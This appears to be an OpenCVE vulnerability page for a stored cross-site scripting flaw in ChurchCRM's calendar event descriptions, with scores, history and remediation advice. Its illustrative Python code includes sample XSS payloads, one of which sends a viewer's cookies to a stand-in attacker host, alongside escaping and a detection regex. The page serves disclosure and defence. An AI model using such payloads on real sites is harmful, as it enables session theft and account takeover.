Description
ChurchCRM is an open-source church management system. Versions prior to 6.7.2 have a Stored Cross-Site Scripting (XSS) vulnerability that occurs in Create Events in Church Calendar. Users with low privileges can create XSS payloads in the Description field. This payload is stored in the database, and when other users view that event (including the admin), the payload is triggered, leading to account takeover. Version 6.7.2 fixes the vulnerability.
Published: 2026-01-30
Score: 7.2 High
EPSS: < 1% Very Low
KEV: No
Impact: Account Takeover via Stored XSS
Action: Apply Patch
AI Analysis

Impact

The vulnerability is a stored cross-site scripting flaw (CWE-79) in the Create Events function of the ChurchCRM Church Calendar. A low-privilege user can place JavaScript in an event's Description field; the text is saved to the database unchanged and, when the event is later displayed to any other user, including an administrator, is written into the page without HTML encoding, so the viewer's browser executes it. Because the script runs inside the victim's authenticated session, it can read whatever that session can read and issue requests as that user, which is how the "account takeover" in the description arises. The flaw is stored, not reflected: the missing control is encoding of stored data at the point where it is rendered, not only validation at the point where it is submitted.

Affected Systems

The product affected is ChurchCRM, an open-source church management system. All releases prior to version 6.7.2 contain the flaw; version 6.7.2 and later include the fix. The vulnerable code path is the Create Events feature of the Church Calendar: any account able to create events is a potential attacker, and every user who can view calendar events, administrators included, is a potential victim.

Risk and Exploitability

The CNA-assigned CVSS 4.0 base score is 7.2 (High); its vector (AV:N/AC:L/AT:N/PR:L/UI:P) records a network-reachable attack that needs only a low-privileged account and a victim who merely opens the event. NVD's CVSS 3.1 assessment recorded on this page is lower, 5.4 (Medium), because its vector rates confidentiality and integrity impact as Low (C:L/I:L/S:C), whereas the v4.0 vector credits the subsequent-system impact of an administrator's browser being hijacked. CVSS measures severity, not probability: the EPSS estimate below 1 % indicates low expected exploitation activity, and the flaw is not listed in the CISA Known Exploited Vulnerabilities catalog, although the SSVC record notes that a proof of concept exists. Exploitation requires an attacker who already holds an account able to create events, so the exposure comes from insiders or anyone who can obtain such an account; this is not a local-access vector, since both the injection and the victim's page load happen over the network. Once an administrator views the event, the script runs with that administrator's session and can act as them.

Generated by OpenCVE AI on April 18, 2026 at 01:06 UTC.

Remediation

Vendor fix: upgrade to ChurchCRM 6.7.2 or later, which the CVE description identifies as the fixed release. No vendor-documented workaround for earlier versions is recorded here.

OpenCVE Recommended Actions

  • Upgrade ChurchCRM to version 6.7.2 or later to apply the official fix
  • If an upgrade cannot be applied immediately, restrict event creation to trusted roles and review existing event descriptions for markup before other users view them
  • Audit stored event descriptions for script content and delete or rewrite any that contain it, since upgrading fixes the rendering but does not remove payloads already in the database
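To make the mechanism in the Impact section and the audit step in the recommendations above concrete, the following Python is an added illustration, not ChurchCRM code: it contrasts unencoded and HTML-encoded rendering of a stored description, and flags stored descriptions that contain markup. The event rows, column names and payloads are constructed for the example; ChurchCRM itself is written in PHP, where the equivalent of html.escape is htmlspecialchars.

```python
import html
import re

# Constructed sample rows standing in for stored calendar events. These are not
# ChurchCRM data and the column names are an assumption made for this example.
SAMPLE_EVENTS = [
    {"id": 1, "title": "Sunday Service", "desc": "Worship at 10:00, coffee after."},
    {"id": 2, "title": "Youth Night", "desc": "Bring a friend & snacks <3"},
    {"id": 3, "title": "Board Meeting",
     "desc": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"},
    {"id": 4, "title": "Potluck", "desc": "<script>alert(1)</script> Sign up below"},
]


def render_unsafe(desc: str) -> str:
    """Pre-fix style rendering: the stored text is placed in the page as raw HTML,
    so any markup the event author typed becomes live DOM for every viewer."""
    return f"<div class='event-desc'>{desc}</div>"


def render_safe(desc: str) -> str:
    """Hardened rendering: encode for an HTML text context at output time.
    PHP equivalent: htmlspecialchars($desc, ENT_QUOTES | ENT_HTML5, 'UTF-8')."""
    return f"<div class='event-desc'>{html.escape(desc, quote=True)}</div>"


# Conservative indicators of stored markup that could execute in a viewer's browser:
# any tag-like token, an inline event handler attribute, or a javascript: URL.
_SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z!]"      # "<script", "</div", "<!--", etc.
    r"|\bon[a-z]+\s*="      # onerror=, onload=, onclick=, ...
    r"|javascript\s*:",     # javascript: in href/src
    re.IGNORECASE,
)


def audit_descriptions(events):
    """Return the ids of events whose stored description contains markup.
    Intended for finding payloads already in the database before or after
    upgrading; matches are for manual review, not automatic deletion."""
    return [e["id"] for e in events if _SUSPICIOUS.search(e["desc"])]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["id"], "unsafe:", render_unsafe(e["desc"]))
        print(e["id"], "safe:  ", render_safe(e["desc"]))
    print("events needing review:", audit_descriptions(SAMPLE_EVENTS))
```

The audit regex is deliberately broad (a plain "a <b" comparison in a description would be flagged too) because the goal is a short review list, not a filter: tag-stripping heuristics are bypassable, so the durable control is the output encoding shown in render_safe, which is what the 6.7.2 upgrade supplies.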

Generated by OpenCVE AI on April 18, 2026 at 01:06 UTC.

Advisories

No advisories yet.

History

Tue, 17 Feb 2026 14:45:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


Tue, 03 Feb 2026 15:00:00 +0000

Type                 Values Removed    Values Added
First Time appeared                    Churchcrm
                                       Churchcrm churchcrm
Vendors & Products                     Churchcrm
                                       Churchcrm churchcrm

Fri, 30 Jan 2026 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Fri, 30 Jan 2026 15:30:00 +0000

Type Values Removed Values Added
Description ChurchCRM is an open-source church management system. Versions prior to 6.7.2 have a Stored Cross-Site Scripting (XSS) vulnerability occurs in Create Events in Church Calendar. Users with low privileges can create XSS payloads in the Description field. This payload is stored in the database, and when other users view that event (including the admin), the payload is triggered, leading to account takeover. Version 6.7.2 fixes the vulnerability.
Title ChurchCRM has Stored Cross-Site Scripting (XSS) in Create Events in Church Calendar, Leading to Account Takeover
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 7.2, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:H/SI:H/SA:H/E:P'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-30T15:50:58.147Z

Reserved: 2026-01-27T14:51:03.061Z

Link: CVE-2026-24855

Vulnrichment

Updated: 2026-01-30T15:50:31.916Z

NVD

Status : Analyzed

Published: 2026-01-30T16:16:13.790

Modified: 2026-02-17T14:32:44.697

Link: CVE-2026-24855

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T01:15:05Z

Weaknesses